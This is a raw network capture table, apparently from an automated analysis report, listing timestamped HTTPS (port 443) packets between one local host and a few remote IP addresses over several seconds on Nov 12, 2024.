                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.399681091 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.446032047 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.454919100 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.471796036 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.475542068 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.477679014 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.486988068 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.487112999 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.490044117 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.507036924 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.507858992 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.509006977 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.513115883 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.525666952 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.541023970 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.589982986 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.601591110 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.626167059 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.631421089 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.634951115 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.635240078 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.635332108 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.637988091 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.640881062 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.641473055 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.646375895 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.649491072 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.670993090 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.689366102 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.737993002 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.754959106 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.767875910 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.767987013 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.768055916 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.768069983 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.768147945 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.779834986 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.799204111 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.799866915 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.800052881 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.800928116 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.804352045 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.804652929 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.804887056 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.805747032 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.815538883 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.820427895 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.865921974 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.926997900 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.927062988 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.927170992 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.927675962 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.928595066 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.928675890 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.929524899 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.930548906 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.931148052 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.931655884 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.931952000 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.936113119 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.936198950 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.937907934 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.937922955 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.946492910 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.949194908 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:11.998522043 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.057952881 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.058413029 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.058494091 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.060806036 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.061084986 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.062181950 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.062999010 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.063071966 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.064277887 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.064771891 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.065660954 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.065927029 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.070152044 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.071134090 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.076031923 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.077923059 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.125921011 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.186970949 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.187561035 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.187618017 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.190558910 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.190592051 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.192209005 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.194191933 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.195429087 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.195494890 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.196506977 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.196589947 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.202322006 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.206326008 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.208236933 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.213161945 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.321712017 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.321794987 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.321845055 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.321850061 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.322453022 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.322506905 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.327137947 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.327228069 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.328022957 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.330606937 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.332104921 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.333116055 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.336244106 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.336344957 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.338701010 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.343657970 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.417767048 CET49677443192.168.2.920.189.173.11
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628577948 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628648043 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628762960 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628779888 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628798962 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628813028 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628823042 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628873110 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.628895044 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.632637978 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.632817984 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.632849932 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.633423090 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.633722067 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.637639999 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.638248920 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.681942940 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.760221958 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.760356903 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.760433912 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.760621071 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.760637045 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.760715961 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.761814117 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.761856079 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.761898041 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.765628099 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.765801907 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.766339064 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.767317057 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.767447948 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.770416975 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.770629883 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.771106005 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.772090912 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.772212982 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.900801897 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.900831938 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.900932074 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.901540041 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.902625084 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.902638912 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.902698040 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.902951956 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.903006077 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.905672073 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.905775070 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.905822992 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.906225920 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.906653881 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.910538912 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.910665989 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.910681963 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.911062956 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:12.911453962 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.038360119 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.038378954 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.038499117 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.038527012 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.038712025 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.038794041 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.038923979 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.039733887 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.039824963 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.042469978 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.042542934 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.043553114 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.043873072 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.044043064 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.047322989 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.047389984 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.048866987 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.049010992 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.170517921 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.170535088 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.170547009 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.170628071 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.171463966 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.171478987 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.171540022 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.171720028 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.171781063 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.172368050 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.174561977 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.174767017 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.174853086 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.174910069 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.174916983 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.174979925 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.175354958 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.175456047 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.177244902 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.179390907 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.179532051 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.180138111 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.180299044 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.182101965 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.277152061 CET49676443192.168.2.923.206.229.209
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.277152061 CET49675443192.168.2.923.206.229.209
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.302891970 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.302994967 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.303067923 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.303760052 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.304461002 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.304546118 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.304769993 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.306152105 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.306226969 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.306432009 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.307091951 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.308072090 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.308907986 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.309168100 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.311300039 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.312228918 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.312875986 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.313731909 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.313894033 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.432925940 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.434561014 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.434653044 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.435065031 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.435435057 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.435518026 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.436199903 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.436353922 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.441410065 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.542797089 CET49674443192.168.2.923.206.229.209
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.563755035 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.564192057 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.564263105 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:13.620966911 CET49673443192.168.2.9204.79.197.203
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:22.027173996 CET49677443192.168.2.920.189.173.11
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:22.886624098 CET49676443192.168.2.923.206.229.209
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:22.889878035 CET49675443192.168.2.923.206.229.209
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:23.152210951 CET49674443192.168.2.923.206.229.209
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.434941053 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.434986115 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.435085058 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.564169884 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.564184904 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.433945894 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.434030056 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.438013077 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.438019037 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.438294888 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.480387926 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.898412943 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:25.943340063 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.309169054 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.309544086 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.309591055 CET44349707140.82.121.4192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.309622049 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.309673071 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.344800949 CET49707443192.168.2.9140.82.121.4
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.371696949 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.371733904 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.371854067 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.372262001 CET49708443192.168.2.9185.199.111.133
